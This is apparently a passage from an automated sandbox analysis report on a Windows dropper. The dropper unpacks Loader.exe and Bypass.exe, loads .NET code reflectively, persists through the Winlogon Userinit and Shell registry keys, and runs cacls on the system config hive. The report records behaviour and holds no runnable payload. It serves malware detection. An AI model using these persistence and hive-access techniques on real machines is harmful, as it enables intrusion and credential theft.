                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: nC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: hC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: yC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: |C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: bFZYRLnRIz.exe, 572stuOQ0pZG2Xj.exe.0.dr
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: vC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: bFZYRLnRIz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: bFZYRLnRIz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: bFZYRLnRIz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: bFZYRLnRIz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: bFZYRLnRIz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: 15.2.Bypass.exe.1b5c0000.4.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeFile created: C:\Users\user\AppData\Local\Temp\Loader\__tmp_rar_sfx_access_check_5195312Jump to behavior
                      Source: bFZYRLnRIz.exeStatic PE information: section name: .didat
                      Source: bFZYRLnRIz.exeStatic PE information: section name: _RDATA
                      Source: 572stuOQ0pZG2Xj.exe.0.drStatic PE information: section name: .didat
                      Source: 572stuOQ0pZG2Xj.exe.0.drStatic PE information: section name: _RDATA
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716155156 push rsi; retf 0_2_00007FF716155157
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716155166 push rsi; retf 0_2_00007FF716155167
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D365156 push rsi; retf 11_2_00007FF64D365157
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D365166 push rsi; retf 11_2_00007FF64D365167
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009C7205 push ecx; ret 12_2_009C7218
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1F51A push ds; iretd 12_2_00A1F523
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004403F7 push ds; retf 13_2_004403FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043FC98 pushfd ; ret 13_2_0043FC99
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00429522 push ds; iretd 13_2_0042952B
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAE3074 push ebx; iretd 15_2_00007FFD9BAE307A
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAD74B1 pushfd ; ret 15_2_00007FFD9BAD74B2

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeFile created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeJump to dropped file
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeFile created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeFile created: C:\ProgramData\SoftwareDistribution\Bypass.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeFile created: C:\ProgramData\SoftwareDistribution\Bypass.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
                      Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
